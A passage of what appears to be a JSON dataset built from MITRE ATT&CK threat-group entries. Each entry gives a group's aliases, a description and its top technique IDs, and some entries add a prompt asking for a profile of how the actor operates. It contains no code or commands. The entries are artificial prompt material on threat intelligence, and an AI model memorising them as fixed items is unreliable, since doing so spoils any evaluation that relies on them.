targeted victims in the Middle East and has been active since at least December 2017. The group has mainly targeted victims in the defense, military, and government sectors.", "top_techniques": [{"id": "T1027", "name": "Obfuscated Files or Information"}, {"id": "T1059.001", "name": "PowerShell"}, {"id": "T1204.002", "name": "Malicious File"}, {"id": "T1559.002", "name": "Dynamic Data Exchange"}, {"id": "T1560.001", "name": "Archive via Utility"}, {"id": "T1566.001", "name": "Spearphishing Attachment"}]}, {"name": "Ferocious Kitten", "attack_id": "G0137", "aliases": ["Ferocious Kitten"], "description": "Ferocious Kitten is a threat group that has primarily targeted Persian-speaking individuals in Iran since at least 2015.", "top_techniques": [{"id": "T1036.002", "name": "Right-to-Left Override"}, {"id": "T1036.005", "name": "Match Legitimate Resource Name or Location"}, {"id": "T1204.002", "name": "Malicious File"}, {"id": "T1566.001", "name": "Spearphishing Attachment"}, {"id": "T1583.001", "name": "Domains"}, {"id": "T1588.002", "name": "Tool"}]}, {"name": "Suckfly", "attack_id": "G0039", "aliases": ["Suckfly"], "description": "Suckfly is a China-based threat group that has been active since at least 2014.", "top_techniques": [{"id": "T1003", "name": "OS Credential Dumping"}, {"id": "T1046", "name": "Network Service Discovery"}, {"id": "T1059.003", "name": "Windows Command Shell"}, {"id": "T1078", "name": "Valid Accounts"}, {"id": "T1553.002", "name": "Code Signing"}]}, {"name": "RedEcho", "attack_id": "G1042", "aliases": ["RedEcho"], "description": "RedEcho is a People’s Republic of China-related threat actor associated with long-running intrusions in Indian critical infrastructure entities. RedEcho overlaps with various other PRC-linked threat groups, such as APT41, and is linked to ShadowPad malware use through shared infrastructure.", "top_techniques": [{"id": "T1071.001", "name": "Web Protocols"}, {"id": "T1568", "name": "Dynamic Resolution"}, {"id": "T1571", "name": "Non-Standard Port"}, {"id": "T1573.002", "name": "Asymmetric Cryptography"}, {"id": "T1583.001", "name": "Domains"}]}, {"name": "APT12", "attack_id": "G0005", "aliases": ["APT12", "IXESHE", "DynCalc", "Numbered Panda", "DNSCALC"], "description": "APT12 is a threat group that has been attributed to China. The group has targeted a variety of victims including but not limited to media outlets, high-tech companies, and multiple governments.", "top_techniques": [{"id": "T1102.002", "name": "Bidirectional Communication"}, {"id": "T1203", "name": "Exploitation for Client Execution"}, {"id": "T1204.002", "name": "Malicious File"}, {"id": "T1566.001", "name": "Spearphishing Attachment"}, {"id": "T1568.003", "name": "DNS Calculation"}]}, {"name": "TA459", "attack_id": "G0062", "aliases": ["TA459"], "description": "TA459 is a threat group believed to operate out of China that has targeted countries including Russia, Belarus, Mongolia, and others.", "top_techniques": [{"id": "T1059.001", "name": "PowerShell"}, {"id": "T1059.005", "name": "Visual Basic"}, {"id": "T1203", "name": "Exploitation for Client Execution"}, {"id": "T1204.002", "name": "Malicious File"}, {"id": "T1566.001", "name": "Spearphishing Attachment"}]}, {"name": "Volatile Cedar", "attack_id": "G0123", "aliases": ["Volatile Cedar", "Lebanese Cedar"], "description": "Volatile Cedar is a Lebanese threat group that has targeted individuals, companies, and institutions worldwide. Volatile Cedar has been operating since 2012 and is motivated by political and ideological interests.", "top_techniques": [{"id": "T1105", "name": "Ingress Tool Transfer"}, {"id": "T1190", "name": "Exploit Public-Facing Application"}, {"id": "T1505.003", "name": "Web Shell"}, {"id": "T1595.002", "name": "Vulnerability Scanning"}, {"id": "T1595.003", "name": "Wordlist Scanning"}]}, {"name": "Cleaver", "attack_id": "G0003", "aliases": ["Cleaver", "Threat Group 2889", "TG-2889"], "description": "Cleaver is a threat group that has been attributed to Iranian actors and is responsible for activity tracked as Operation Cleaver. Strong circumstantial evidence suggests Cleaver is linked to Threat Group 2889 (TG-2889).", "top_techniques": [{"id": "T1003.001", "name": "LSASS Memory"}, {"id": "T1557.002", "name": "ARP Cache Poisoning"}, {"id": "T1585.001", "name": "Social Media Accounts"}, {"id": "T1587.001", "name": "Malware"}, {"id": "T1588.002", "name": "Tool"}]}, {"name": "Threat Group-1314", "attack_id": "G0028", "aliases": ["Threat Group-1314", "TG-1314"], "description": "Threat Group-1314 is an unattributed threat group that has used compromised credentials to log into a victim's remote access infrastructure.", "top_techniques": [{"id": "T1021.002", "name": "SMB/Windows Admin Shares"}, {"id": "T1059.003", "name": "Windows Command Shell"}, {"id": "T1072", "name": "Software Deployment Tools"}, {"id": "T1078.002", "name": "Domain Accounts"}]}, {"name": "Group5", "attack_id": "G0043", "aliases": ["Group5"], "description": "Group5 is a threat group with a suspected Iranian nexus, though this attribution is not definite. The group has targeted individuals connected to the Syrian opposition via spearphishing and watering holes, normally using Syrian and Iranian themes. Group5 has used two commonly available remote access tools (RATs), njRAT and NanoCore, as well as an Android RAT, DroidJack.", "top_techniques": [{"id": "T1027.013", "name": "Encrypted/Encoded File"}, {"id": "T1056.001", "name": "Keylogging"}, {"id": "T1070.004", "name": "File Deletion"}, {"id": "T1113", "name": "Screen Capture"}]}, {"name": "Putter Panda", "attack_id": "G0024", "aliases": ["Putter Panda", "APT2", "MSUpdater"], "description": "Putter Panda is a Chinese threat group that has been attributed to Unit 61486 of the 12th Bureau of the PLA’s 3rd General Staff Department (GSD).", "top_techniques": [{"id": "T1027.013", "name": "Encrypted/Encoded File"}, {"id": "T1055.001", "name": "Dynamic-link Library Injection"}, {"id": "T1547.001", "name": "Registry Run Keys / Startup Folder"}, {"id": "T1685", "name": "Disable or Modify Tools"}]}, {"name": "Thrip", "attack_id": "G0076", "aliases": ["Thrip"], "description": "Thrip is an espionage group that has targeted satellite communications, telecoms, and defense contractor companies in the U.S. and Southeast Asia. The group uses custom malware as well as \"living off the land\" techniques.", "top_techniques": [{"id": "T1048.003", "name": "Exfiltration Over Unencrypted Non-C2 Protocol"}, {"id": "T1059.001", "name": "PowerShell"}, {"id": "T1219.002", "name": "Remote Desktop Software"}, {"id": "T1588.002", "name": "Tool"}]}, {"name": "SilverTerrier", "attack_id": "G0083", "aliases": ["SilverTerrier"], "description": "SilverTerrier is a Nigerian threat group that has been seen active since 2014. SilverTerrier mainly targets organizations in high technology, higher education, and manufacturing.", "top_techniques": [{"id": "T1071.001", "name": "Web Protocols"}, {"id": "T1071.002", "name": "File Transfer Protocols"}, {"id": "T1071.003", "name": "Mail Protocols"}, {"id": "T1657", "name": "Financial Theft"}]}, {"name": "TA578", "attack_id": "G1038", "aliases": ["TA578"], "description": "TA578 is a threat actor that has used contact forms and email to initiate communications with victims and to distribute malware including Latrodectus, IcedID, and Bumblebee.", "top_techniques": [{"id": "T1059.007", "name": "JavaScript"}, {"id": "T1204.001", "name": "Malicious Link"}, {"id": "T1583.006", "name": "Web Services"}, {"id": "T1594", "name": "Search Victim-Owned Websites"}]}, {"name": "Water Galura", "attack_id": "G1050", "aliases": ["Water Galura", "GOLD FEATHER"], "description": "Water Galura are the operators of the Qilin Ransomware-as-a-Service (RaaS) who handle payload generation, ransom negotiations, and the publication of stolen data for Qilin affilates recruited on Russian cybercrime forums. Water Galura have been active since at least 2022 and use a double extortion model where they demand payment for providing decryption keys and for refraining from publishing the stolen data to their leak site.", "top_techniques": [{"id": "T1486", "name": "Data Encrypted for Impact"}, {"id": "T1585.001", "name": "Social Media Accounts"}, {"id": "T1657", "name": "Financial Theft"}]}, {"name": "Strider", "attack_id": "G0041", "aliases": ["Strider", "ProjectSauron"], "description": "Strider is a threat group that has been active since at least 2011 and has targeted victims in Russia, China, Sweden, Belgium, Iran, and Rwanda.", "top_techniques": [{"id": "T1090.001", "name": "Internal Proxy"}, {"id": "T1556.002", "name": "Password Filter DLL"}, {"id": "T1564.005", "name": "Hidden File System"}]}, {"name": "APT30", "attack_id": "G0013", "aliases": ["APT30"], "description": "APT30 is a threat group suspected to be associated with the Chinese government. While Naikon shares some characteristics with APT30, the two groups do not appear to be exact matches.", "top_techniques": [{"id": "T1204.002", "name": "Malicious File"}, {"id": "T1566.001", "name": "Spearphishing Attachment"}]}, {"name": "Orangeworm", "attack_id": "G0071", "aliases": ["Orangeworm"], "description": "Orangeworm is a group that has targeted organizations in the healthcare sector in the United States, Europe, and Asia since at least 2015, likely for the purpose of corporate espionage. Reverse engineering of Kwampirs, directly associated with Orangeworm activity, indicates significant functional and development overlaps with Shamoon.", "top_techniques": [{"id": "T1021.002", "name": "SMB/Windows Admin Shares"}, {"id": "T1071.001", "name": "Web Protocols"}]}, {"name": "GCMAN", "attack_id": "G0036", "aliases": ["GCMAN"], "description": "GCMAN is a threat group that focuses on targeting banks for the purpose of transferring money to e-currency services.", "top_techniques": [{"id": "T1021.004", "name": "SSH"}, {"id": "T1021.005", "name": "VNC"}]}, {"name": "PittyTiger", "attack_id": "G0011", "aliases": ["PittyTiger"], "description": "PittyTiger is a threat group believed to operate out of China that uses multiple different types of malware to maintain command and control.", "top_techniques": [{"id": "T1078", "name": "Valid Accounts"}, {"id": "T1588.002", "name": "Tool"}]}, {"name": "APT17", "attack_id": "G0025", "aliases": ["APT17", "Deputy Dog"], "description": "APT17 is a China-based threat group that has conducted network intrusions against U.S. government entities, the defense industry, law firms, information technology companies, mining companies, and non-government organizations.", "top_techniques": [{"id": "T1583.006", "name": "Web Services"}, {"id": "T1585", "name": "Establish Accounts"}]}, {"name": "AppleJeus", "attack_id": "G1049", "aliases": ["AppleJeus", "Gleaming Pisces", "Citrine Sleet", "UNC1720", "UNC4736"], "description": "AppleJeus is a North Korean state-sponsored threat group attributed to the Reconnaissance General Bureau. Associated with the broader Lazarus Group umbrella of actors, AppleJeus has been active since at least 2018 and is closely aligned in resources with TEMP.hermit, another DPRK-affiliated group under the same umbrella. The group’s primary mission is to generate and launder revenue to provide financial support to the government. AppleJeus primarily targets the cryptocurrency industry and is most notably responsible for the 3CX Supply Chain Attack. The group traditionally deploys malicious cryptocurrency software in combination with Phishing. From these compromised environments, it selectively deploys additional backdoors to enable extended operations against high-value financial targets.", "top_techniques": [{"id": "T1566", "name": "Phishing"}, {"id": "T1657", "name": "Financial Theft"}]}, {"name": "BlackOasis", "attack_id": "G0063", "aliases": ["BlackOasis"], "description": "BlackOasis is a Middle Eastern threat group that is believed to be a customer of Gamma Group. The group has shown interest in prominent figures in the United Nations, as well as opposition bloggers, activists, regional news correspondents, and think tanks. A group known by Microsoft as NEODYMIUM is reportedly associated closely with BlackOasis operations, but evidence that the group names are aliases has not been identified.", "top_techniques": [{"id": "T1027", "name": "Obfuscated Files or Information"}]}, {"name": "Scarlet Mimic", "attack_id": "G0029", "aliases": ["Scarlet Mimic"], "description": "Scarlet Mimic is a threat group that has targeted minority rights activists. This group has not been directly linked to a government source, but the group's motivations appear to overlap with those of the Chinese government. While there is some overlap between IP addresses used by Scarlet Mimic and Putter Panda, it has not been concluded that the groups are the same.", "top_techniques": [{"id": "T1036.002", "name": "Right-to-Left Override"}]}, {"name": "APT16", "attack_id": "G0023", "aliases": ["APT16"], "description": "APT16 is a China-based threat group that has launched spearphishing campaigns targeting Japanese and Taiwanese organizations.", "top_techniques": [{"id": "T1584.004", "name": "Server"}]}, {"name": "Moafee", "attack_id": "G0002", "aliases": ["Moafee"], "description": "Moafee is a threat group that appears to operate from the Guandong Province of China. Due to overlapping TTPs, including similar custom tools, Moafee is thought to have a direct or indirect relationship with the threat group DragonOK.", "top_techniques": [{"id": "T1027.001", "name": "Binary Padding"}]}, {"name": "TEMP.Veles", "attack_id": "G0088", "aliases": ["TEMP.Veles", "XENOTIME"], "description": "TEMP.Veles is a Russia-based threat group that has targeted critical infrastructure. The group has been observed utilizing TRITON, a malware framework designed to manipulate industrial safety systems.", "top_techniques": []}, {"name": "NEODYMIUM", "attack_id": "G0055", "aliases": ["NEODYMIUM"], "description": "NEODYMIUM is an activity group that conducted a campaign in May 2016 and has heavily targeted Turkish victims. The group has demonstrated similarity to another activity group called PROMETHIUM due to overlapping victim and campaign characteristics. NEODYMIUM is reportedly associated closely with BlackOasis operations, but evidence that the group names are aliases has not been identified.", "top_techniques": []}, {"name": "DragonOK", "attack_id": "G0017", "aliases": ["DragonOK"], "description": "DragonOK is a threat group that has targeted Japanese organizations with phishing emails. Due to overlapping TTPs, including similar custom tools, DragonOK is thought to have a direct or indirect relationship with the threat group Moafee. It is known to use a variety of malware, including Sysget/HelloBridge, PlugX, PoisonIvy, FormerFirstRat, NFlog, and NewCT.", "top_techniques": []}, {"name": "APT-C-23", "attack_id": "G1028", "aliases": ["APT-C-23", "Mantis", "Arid Viper", "Desert Falcon", "TAG-63", "Grey Karkadann", "Big Bang APT", "Two-tailed Scorpion"], "description": "APT-C-23 is a threat group that has been active since at least 2014. APT-C-23 has primarily focused its operations on the Middle East, including Israeli military assets. APT-C-23 has developed mobile spyware targeting Android and iOS devices since 2017.", "top_techniques": []}, {"name": "APT28", "attack_id": "G0007", "aliases": ["APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Swallowtail", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch"], "_prompt": "[MITRE ATT&CK Group lookup]\nName: APT28 (G0007)\nAliases: APT28, IRON TWILIGHT, SNAKEMACKEREL, Swallowtail, Group 74, Sednit, Sofacy, Pawn Storm, Fancy Bear, STRONTIUM, Tsar Team, Threat Group-4127, TG-4127, Forest Blizzard, FROZENLAKE, GruesomeLarch\nAttributed techniques: T1001.001, T1003, T1003.001, T1003.003, T1005, T1014, T1021.002, T1025, T1027.013, T1030, T1036, T1036.005\nDescription: APT28 is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165. This group has been active since at least 2004. APT28 reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election. In 2018, the US indicted five GRU Unit 26165 officers associated with APT28 for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, t\n\nProfile this threat actor and summarize how they operate."}, {"name": "APT29", "attack_id": "G0016", "aliases": ["APT29", "IRON RITUAL", "IRON HEMLOCK", "NobleBaron", "Dark Halo", "NOBELIUM", "UNC2452", "YTTRIUM", "The Dukes", "Cozy Bear", "CozyDuke", "SolarStorm", "Blue Kitsune", "UNC3524", "Midnight Blizzard"], "_prompt": "[MITRE ATT&CK Group lookup]\nName: APT29 (G0016)\nAliases: APT29, IRON RITUAL, IRON HEMLOCK, NobleBaron, Dark Halo, NOBELIUM, UNC2452, YTTRIUM, The Dukes, Cozy Bear, CozyDuke, SolarStorm, Blue Kitsune, UNC3524, Midnight Blizzard\nAttributed techniques: T1003.002, T1003.004, T1005, T1016.001, T1021.007, T1027.001, T1027.002, T1027.006, T1036.005, T1037, T1037.004, T1047\nDescription: APT29 is threat group that has been attributed to Russia's Foreign Intelligence Service (SVR). They have operated since at least 2008, often targeting government networks in Europe and NATO member countries, research institutes, and think tanks. APT29 reportedly compromised the Democratic National Committee starting in the summer of 2015. In April 2021, the US and UK governments attributed the SolarWinds Compromise to the SVR; public statements included citations to APT29, Cozy Bear, and The Dukes. Industry reporting also referred to the actors involved in this campaign as UNC2452, NOBELIUM, StellarParticle, Dark Halo, and SolarStorm.\n\nProfile this threat actor and summarize how they operate."}, {"name": "APT41", "attack_id": "G0096", "aliases": ["APT41", "Wicked Panda", "Brass Typhoon", "BARIUM"], "_prompt": "[MITRE ATT&CK Group lookup]\nName: APT41 (G0096)\nAliases: APT41, Wicked Panda, Brass Typhoon, BARIUM\nAttributed techniques: T1003.001, T1003.002, T1003.003, T1005, T1008, T1012, T1014, T1016, T1018, T1021.001, T1021.002, T1027\nDescription: APT41 is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, APT41 has been observed targeting various industries, including but not limited to healthcare, telecom, technology, finance, education, retail and video game industries in 14 countries. Notable behaviors include using a wide range of malware and tools to complete mission objectives. APT41 overlaps at least partially with public reporting on groups including BARIUM and Winnti Group.\n\nProfile this threat actor and summarize how they operate."}, {"name": "Lazarus Group", "attack_id": "G0032", "aliases": ["Lazarus Group", "Labyrinth Chollima", "HIDDEN COBRA", "Guardians of Peace", "ZINC", "NICKEL ACADEMY", "Diamond Sleet"], "_prompt": "[MITRE ATT&CK Group lookup]\nName: Lazarus Group (G0032)\nAliases: Lazarus Group, Labyrinth Chollima, HIDDEN COBRA, Guardians of Peace, ZINC, NICKEL ACADEMY, Diamond Sleet\nAttributed techniques: T1001.003, T1005, T1008, T1010, T1012, T1016, T1021.001, T1021.002, T1021.004, T1027.007, T1027.009, T1027.013\nDescription: Lazarus Group is a North Korean state-sponsored cyber threat group attributed to the Reconnaissance General Bureau (RGB). Lazarus Group has been active since at least 2009 and is reportedly responsible for the November 2014 destructive wiper attack on Sony Pictures Entertainment, identified by Novetta as part of Operation Blockbuster. Malware used by Lazarus Group correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain. North Korea’s cyber operations have shown a consistent pattern of adaptation, forming and reorganizing units as national priorities shift. These units frequently share personnel, infrastructure, ma\n\nProfile this threat actor and summarize how they operate."}, {"name": "FIN7", "attack_id": "G0046", "aliases": ["FIN7", "GOLD NIAGARA", "ITG14", "Carbon Spider", "ELBRUS", "Sangria Tempest"], "_prompt": "[MITRE ATT&CK Group lookup]\nName: FIN7 (G0046)\nAliases: FIN7, GOLD NIAGARA, ITG14, Carbon Spider, ELBRUS, Sangria Tempest\nAttributed techniques: T1005, T1008, T1021.001, T1021.004, T1021.005, T1027.010, T1027.016, T1033, T1036.004, T1036.005, T1047, T1053.005\nDescription: FIN7 is a financially-motivated threat group that has been active since 2013. FIN7 has targeted the retail, restaurant, hospitality, software, consulting, financial services, medical equipment, cloud services, media, food and beverage, transportation, pharmaceutical, and utilities industries in the United States. A portion of FIN7 was operated out of a front company called Combi Security and often used point-of-sale malware for targeting efforts. Since 2020, FIN7 shifted operations to big game hunting (BGH), including use of REvil ransomware and their own Ransomware-as-a-Service (RaaS), Darkside. FIN7 may be linked to the Carbanak Group, but multiple threat groups have been observed using Ca\n\nProfile this threat actor and summarize how they operate."}, {"name": "FIN8", "attack_id": "G0061", "aliases": ["FIN8", "Syssphinx"], "_prompt": "[MITRE ATT&CK Group lookup]\nName: FIN8 (G0061)\nAliases: FIN8, Syssphinx\nAttributed techniques: T1003.001, T1016.001, T1018, T1021.001, T1021.002, T1027.010, T1033, T1047, T1048.003, T1053.005, T1055.004, T1059.001\nDescription: FIN8 is a financially motivated threat group that has been active since at least January 2016, and known for targeting organizations in the hospitality, retail, entertainment, insurance, technology, chemical, and financial sectors. In June 2021, security researchers detected FIN8 switching from targeting point-of-sale (POS) devices to distributing a number of ransomware variants.\n\nProfile this threat actor and summarize how they operate."}, {"name": "Conti", "attack_id": "", "aliases": ["Conti"], "_prompt": "[MITRE ATT&CK lookup]\nName: Conti (S0575) - malware\nDescription: Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies, particularly those in North America. As with other ransomware families, actors using Conti steal sensitive files and information from compromised networks, and threaten to publish this data unless the ransom is paid.\n\nProfile this threat actor and summarize how they operate."}, {"name": "GOLD SOUTHFIELD", "attack_id": "G0115", "aliases": ["GOLD SOUTHFIELD", "Pinchy Spider", "REvil"], "_prompt": "[MITRE ATT&CK Group lookup]\nName: GOLD SOUTHFIELD (G0115)\nAliases: GOLD SOUTHFIELD, Pinchy Spider\nAttributed techniques: T1027.010, T1059.001, T1113, T1133, T1190, T1195.002, T1199, T1219, T1566\nDescription: GOLD SOUTHFIELD is a financially motivated threat group active since at least 2018 that operates the REvil Ransomware-as-a Service (RaaS). GOLD SOUTHFIELD provides backend infrastructure for affiliates recruited on underground forums to perpetrate high value deployments. By early 2020, GOLD SOUTHFIELD started capitalizing on the new trend of stealing data and further extorting the victim to pay for their data to not get publicly leaked.\n\nProfile this threat actor and summarize how they operate."}, {"name": "Sandworm Team", "attack_id": "G0034", "aliases": ["Sandworm Team", "ELECTRUM", "Telebots", "IRON VIKING", "BlackEnergy (Group)", "Quedagh", "Voodoo Bear", "IRIDIUM", "Seashell Blizzard", "FROZENBARENTS", "APT44", "Sandworm"], "_prompt": "[MITRE ATT&CK Group lookup]\nName: Sandworm Team (G0034)\nAliases: Sandworm Team, ELECTRUM, Telebots, IRON VIKING, BlackEnergy (Group), Quedagh, Voodoo Bear, IRIDIUM, Seashell Blizzard, FROZENBARENTS, APT44\nAttributed techniques: T1003.001, T1003.003, T1005, T1018, T1021.002, T1027, T1027.010, T1033, T1036, T1036.005, T1040, T1041\nDescription: Sandworm Team is a destructive threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) Main Center for Special Technologies (GTsST) military unit 74455. This group has been active since at least 2009. In October 2020, the US indicted six GRU Unit 74455 officers associated with Sandworm Team for the following cyber operations: the 2015 and 2016 attacks against Ukrainian electrical companies and government organizations, the 2017 worldwide NotPetya attack, targeting of the 2017 French presidential campaign, the 2018 Olympic Destroyer attack against the Winter Olympic Games, the 2018 operation against the Organisation for the Prohibition of Chemical W\n\nProfile this threat actor and summarize how they operate."}, {"name": "Equation", "attack_id": "G0020", "aliases": ["Equation", "Equation Group"], "_prompt": "[MITRE ATT&CK Group lookup]\nName: Equation (G0020)\nAliases: Equation\nAttributed techniques: T1120, T1480.001, T1542.002, T1564.005\nDescription: Equation is a sophisticated threat group that employs multiple remote access tools. The group is known to use zero-day exploits and has developed the capability to overwrite the firmware of hard disk drives.\n\nProfile this threat actor and summarize how they operate."}, {"name": "Turla", "attack_id": "G0010", "aliases": ["Turla", "IRON HUNTER", "Group 88", "Waterbug", "WhiteBear", "Snake", "Krypton", "Venomous Bear", "Secret Blizzard", "BELUGASTURGEON"], "_prompt": "[MITRE ATT&CK Group lookup]\nName: Turla (G0010)\nAliases: Turla, IRON HUNTER, Group 88, Waterbug, WhiteBear, Snake, Krypton, Venomous Bear, Secret Blizzard, BELUGASTURGEON\nAttributed techniques: T1005, T1007, T1012, T1016, T1016.001, T1018, T1021.002, T1025, T1027.005, T1027.010, T1027.011, T1036.005\nDescription: Turla is a cyber espionage threat group that has been attributed to Russia's Federal Security Service (FSB). They have compromised victims in over 50 countries since at least 2004, spanning a range of industries including government, embassies, military, education, research and pharmaceutical companies. Turla is known for conducting watering hole and spearphishing campaigns, and leveraging in-house tools and malware, such as Uroburos.\n\nProfile this threat actor and summarize how they operate."}, {"name": "HAFNIUM", "attack_id": "G0125", "aliases": ["HAFNIUM", "Operation Exchange Marauder", "Silk Typhoon", "Hafnium"], "_prompt": "[MITRE ATT&CK Group lookup]\nName: HAFNIUM (G0125)\nAliases: HAFNIUM, Operation Exchange Marauder, Silk Typhoon\nAttributed techniques: T1003.001, T1003.003, T1005, T1016, T1016.001, T1018, T1033, T1057, T1059.001, T1059.003, T1068, T1071.001\nDescription: HAFNIUM is a likely state-sponsored cyber espionage group operating out of China that has been active since at least January 2021. HAFNIUM primarily targets entities in the US across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs. HAFNIUM has targeted remote management tools and cloud software for intial access and has demonstrated an ability to quickly operationalize exploits for identified vulnerabilities in edge devices.\n\nProfile this threat actor and summarize how they operate."}, {"name": "Volt Typhoon", "attack_id": "G1017", "aliases": ["Volt Typhoon", "BRONZE SILHOUETTE", "Vanguard Panda", "DEV-0391", "UNC3236", "Voltzite", "Insidious Taurus", "DazedToad"], "_prompt": "[MITRE ATT&CK Group lookup]\nName: Volt Typhoon (G1017)\nAliases: Volt Typhoon, BRONZE SILHOUETTE, Vanguard Panda, DEV-0391, UNC3236, Voltzite, Insidious Taurus, DazedToad\nAttributed techniques: T1003.001, T1003.003, T1005, T1006, T1007, T1010, T1012, T1016, T1016.001, T1018, T1021.001, T1027.002\nDescription: Volt Typhoon is a People's Republic of China (PRC) state-sponsored actor that has been active since at least 2021, primarily targeting critical infrastructure organizations in the US and its territories including Guam. Volt Typhoon's targeting and pattern of behavior have been assessed as pre-positioning to enable lateral movement to operational technology (OT) assets for potential destructive or disruptive attacks. Volt Typhoon has emphasized stealth in operations using web shells, living-off-the-land (LOTL) binaries, hands on keyboard activities, and stolen credentials.. The group has leveraged compromised SOHO routers to proxy command and control traffic and obscure its infrastructure, ac\n\nProfile this threat actor and summarize how they operate."}, {"name": "Magic Hound", "attack_id": "G0059", "aliases": ["Magic Hound", "TA453", "COBALT ILLUSION", "Charming Kitten", "ITG18", "Phosphorus", "Newscaster", "APT35", "Mint Sandstorm"], "_prompt": "[MITRE ATT&CK Group lookup]\nName: Magic Hound (G0059)\nAliases: Magic Hound, TA453, COBALT ILLUSION, Charming Kitten, ITG18, Phosphorus, Newscaster, APT35, Mint Sandstorm\nAttributed techniques: T1003.001, T1005, T1016, T1016.001, T1016.002, T1018, T1021.001, T1027.010, T1027.013, T1033, T1036.004, T1036.005\nDescription: Magic Hound is an Iranian-sponsored threat group that conducts long term, resource-intensive cyber espionage operations, likely on behalf of the Islamic Revolutionary Guard Corps. They have targeted European, U.S., and Middle Eastern government and military personnel, academics, journalists, and organizations such as the World Health Organization (WHO), via complex social engineering campaigns since at least 2014.\n\nProfile this threat actor and summarize how they operate."}, {"name": "APT32", "attack_id": "G0050", "aliases": ["APT32", "SeaLotus", "OceanLotus", "APT-C-00", "Canvas Cyclone", "BISMUTH"], "_prompt": "[MITRE ATT&CK Group lookup]\nName: APT32 (G0050)\nAliases: APT32, SeaLotus, OceanLotus, APT-C-00, Canvas Cyclone, BISMUTH\nAttributed techniques: T1003, T1003.001, T1012, T1016, T1018, T1021.002, T1027.010, T1027.011, T1027.013, T1027.016, T1033, T1036\nDescription: APT32 is a suspected Vietnam-based threat group that has been active since at least 2014. The group has targeted multiple private sector industries as well as foreign governments, dissidents, and journalists with a strong focus on Southeast Asian countries like Vietnam, the Philippines, Laos, and Cambodia. They have extensively used strategic web compromises to compromise victims.\n\nProfile this threat actor and summarize how they operate."}, {"name": "Carbanak", "attack_id": "G0008", "aliases": ["Carbanak", "Anunak"], "_prompt": "[MITRE ATT&CK Group lookup]\nName: Carbanak (G0008)\nAliases: Carbanak, Anunak\nAttributed techniques: T1036.004, T1036.005, T1078, T1102.002, T1218.011, T1219, T1543.003, T1588.002, T1686\nDescription: Carbanak is a cybercriminal group that has used Carbanak malware to target financial institutions since at least 2013. Carbanak may be linked to groups tracked separately as Cobalt Group and FIN7 that have also used Carbanak malware.\n\nProfile this threat actor and summarize how they operate."}, {"name": "Darkhotel", "attack_id": "G0012", "aliases": ["Darkhotel", "DUBNIUM", "Zigzag Hail", "DarkHotel"], "_prompt": "[MITRE ATT&CK Group lookup]\nName: Darkhotel (G0012)\nAliases: Darkhotel, DUBNIUM, Zigzag Hail\nAttributed techniques: T1016, T1027.013, T1036.005, T1056.001, T1057, T1059.003, T1080, T1082, T1083, T1091, T1105, T1124\nDescription: Darkhotel is a suspected South Korean threat group that has targeted victims primarily in East Asia since at least 2004. The group's name is based on cyber espionage operations conducted via hotel Internet networks against traveling executives and other select guests. Darkhotel has also conducted spearphishing campaigns and infected victims through peer-to-peer and file sharing networks.\n\nProfile this threat actor and summarize how they operate."}, {"name": "Cobalt Group", "attack_id": "G0080", "aliases": ["Cobalt Group", "GOLD KINGSWOOD", "Cobalt Gang", "Cobalt Spider"], "_prompt": "[MITRE ATT&CK Group lookup]\nName: Cobalt Group (G0080)\nAliases: Cobalt Group, GOLD KINGSWOOD, Cobalt Gang, Cobalt Spider\nAttributed techniques: T1021.001, T1027.010, T1037.001, T1046, T1053.005, T1055, T1059.001, T1059.003, T1059.005, T1059.007, T1068, T1070.004\nDescription: Cobalt Group is a financially motivated threat group that has primarily targeted financial institutions since at least 2016. The group has conducted intrusions to steal money via targeting ATM systems, card processing, payment systems and SWIFT systems. Cobalt Group has mainly targeted banks in Eastern Europe, Central Asia, and Southeast Asia. One of the alleged leaders was arrested in Spain in early 2018, but the group still appears to be active. The group has been known to target organizations in order to use their access to then compromise additional victims. Reporting indicates there may be links between Cobalt Group and both the malware Carbanak and the group Carbanak.\n\nProfile this threat actor and summarize how they operate."}, {"name": "APT1", "attack_id": "G0006", "aliases": ["APT1", "Comment Crew", "Comment Group", "Comment Panda"], "_prompt": "[MITRE ATT&CK Group lookup]\nName: APT1 (G0006)\nAliases: APT1, Comment Crew, Comment Group, Comment Panda\nAttributed techniques: T1003.001, T1005, T1007, T1016, T1021.001, T1036.005, T1049, T1057, T1059.003, T1087.001, T1114.001, T1114.002\nDescription: APT1 is a Chinese threat group that has been attributed to the 2nd Bureau of the People’s Liberation Army (PLA) General Staff Department’s (GSD) 3rd Department, commonly known by its Military Unit Cover Designator (MUCD) as Unit 61398.\n\nProfile this threat actor and summarize how they operate."}, {"name": "menuPass", "attack_id": "G0045", "aliases": ["menuPass", "Cicada", "POTASSIUM", "Stone Panda", "APT10", "Red Apollo", "CVNX", "HOGFISH", "BRONZE RIVERSIDE"], "_prompt": "[MITRE ATT&CK Group lookup]\nName: menuPass (G0045)\nAliases: menuPass, Cicada, POTASSIUM, Stone Panda, APT10, Red Apollo, CVNX, HOGFISH, BRONZE RIVERSIDE\nAttributed techniques: T1003.002, T1003.003, T1003.004, T1005, T1016, T1018, T1021.001, T1021.004, T1027.013, T1036, T1036.003, T1036.005\nDescription: menuPass is a threat group that has been active since at least 2006. Individual members of menuPass are known to have acted in association with the Chinese Ministry of State Security's (MSS) Tianjin State Security Bureau and worked for the Huaying Haitai Science and Technology Development Company. menuPass has targeted healthcare, defense, aerospace, finance, maritime, biotechnology, energy, and government sectors globally, with an emphasis on Japanese organizations. In 2016 and 2017, the group is known to have targeted managed IT service providers (MSPs), manufacturing and mining companies, and a university.\n\nProfile this threat actor and summarize 